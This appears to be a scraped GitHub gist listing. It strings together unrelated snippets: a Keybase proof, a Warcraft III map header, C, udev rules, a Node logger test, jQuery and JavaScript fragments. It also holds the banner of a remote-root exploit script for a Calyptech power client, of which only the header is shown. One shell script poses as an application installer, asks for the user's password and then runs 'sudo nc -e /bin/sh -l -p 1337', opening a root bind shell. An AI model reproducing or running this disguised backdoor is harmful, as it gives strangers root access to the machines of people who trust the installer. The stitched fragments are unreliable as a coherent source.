I hereby claim:
- I am dnoiz1 on github.
- I am dnz (https://keybase.io/dnz) on keybase.
- I have a public key ASATuCiSiUtSNJ5Oh7Fb6TTHElD1YrTn1nOk9REaSbBLpAo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| //=========================================================================== | |
| // | |
| // Tower Wars_1.9 | |
| // | |
| // Warcraft III map script | |
| // Generated by the Warcraft III World Editor | |
| // Date: Wed Jan 28 01:43:15 2004 | |
| // Map Author: Zak_ | |
| // | |
| //=========================================================================== |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdbool.h> | |
| bool sup; | |
| void nada() | |
| { | |
| if (!sup) printf("nada\n"); | |
| } |
| # create symlinks and set permissions on device connection | |
| # /lib/udev/rules.d/70-arduino-due.rules | |
| # update rules with: udevadm control --reload-rules | |
| SUBSYSTEMS=="usb", ATTRS{idProduct}=="003d", ATTRS{idVendor}=="2341", SYMLINK+="arduino_due", MODE="0666" | |
| SUBSYSTEMS=="usb", ATTRS{idProduct}=="003e", ATTRS{idVendor}=="2341", SYMLINK+="arduino_due_host" MODE="0666" |
| #!/usr/bin/env python | |
| import socket, os, pickle, getopt, subprocess, sys | |
| if __name__ == '__main__': | |
| try: | |
| print """ | |
| ./pwrtropic.py Calyptech IFWT Power Client Remote Root | |
| Vulnerability Discovered and Exploited by Tim Noise <[email protected]> | |
| Not for distribution. 30-9-2013 |
| export PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[0;31m\]$(__git_ps1 '[%s]')\[\033[0m\]$ ' |
| #!/bin/env node | |
| var leg = require('./index.js')(process.stdout, "info"); | |
| leg.trace("trace", "trace"); | |
| leg.debug("debug", "debug"); | |
| leg.info("info", "info"); | |
| leg.warn("warn", "warn"); | |
| leg.fatal("fatal", "fatal"); |
| #!/bin/sh | |
| echo "Installing Application..." | |
| echo "Confirm your password to install" | |
| sudo nc -e '/bin/sh' -l -p 1337 | |
| echo "YOLO" |
| (function($){ | |
| $.confirm = function(params){ | |
| if($('#confirmOverlay').length){ | |
| // A confirm is already shown on the page: | |
| return false; | |
| } | |
| var buttonHTML = ''; |
| var Pilot = function(data) { | |
| this.charID = 0; | |
| this.charName = null; | |
| this.solarSystemID = null; | |
| this.solarSystemName = null; | |
| this.shipTypeID = null; | |
| this.shipTypeName = null; | |
| this.shipID = null; | |
| this.shipName = null; | |
| this.stationID = null; |